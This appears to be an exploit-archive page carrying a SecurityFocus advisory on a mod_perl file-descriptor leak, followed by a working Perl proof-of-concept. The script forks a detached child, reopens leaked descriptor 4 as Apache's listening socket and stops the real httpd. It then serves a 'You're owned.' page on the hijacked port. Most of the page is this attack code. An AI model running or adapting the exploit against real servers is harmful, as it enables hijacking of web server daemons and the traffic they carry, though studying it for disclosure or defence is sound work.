42 lines
No EOL
1.5 KiB
Perl
Executable file
42 lines
No EOL
1.5 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/9471/info
|
|
|
|
A vulnerability has been reported to exist in the Apache mod_perl module that may allow local attackers to gain access to privileged file descriptors. This issue could be exploited by an attacker to hijack a vulnerable server daemon. Other attacks are also possible.
|
|
|
|
It has been reported that multiple file descriptors, are leaked to the mod_perl module and any processes it creates. This allows for Perl scripts and any processes they spawn to access the privileged I/O streams.
|
|
|
|
#!/usr/bin/perl
|
|
|
|
use POSIX qw(setsid);
|
|
|
|
if (!defined(my $pid = fork)) {
|
|
print "Content-Type: text/html\n\n";
|
|
print "cannot fork: $!";
|
|
exit 1;
|
|
} elsif ($pid) { # This is the parent
|
|
sleep(1);
|
|
print "Content-Type: text/html\n\n";
|
|
print "<html><body>Exploit installed</body></html>";
|
|
system '/usr/sbin/httpd2 -k stop';
|
|
sleep(2);
|
|
exit 0;
|
|
}
|
|
|
|
# This is the Child
|
|
setsid;
|
|
sleep(2);
|
|
my $leak = 4;
|
|
open(Server, "+<&$leak");
|
|
while (1) {
|
|
my $rin = '';
|
|
vec($rin,fileno(Server),1) = 1;
|
|
$nfound = select($rout = $rin, undef, undef, undef);
|
|
if (accept(Client,Server) ) {
|
|
print Client "HTTP/1.0 200 OK\n";
|
|
print Client "Content-Length: 40\n";
|
|
print Client "Content-Type: text/html\n\n";
|
|
print Client "<html><body>";
|
|
print Client "You're owned.";
|
|
print Client "</body></html>";
|
|
close Client;
|
|
}
|
|
} |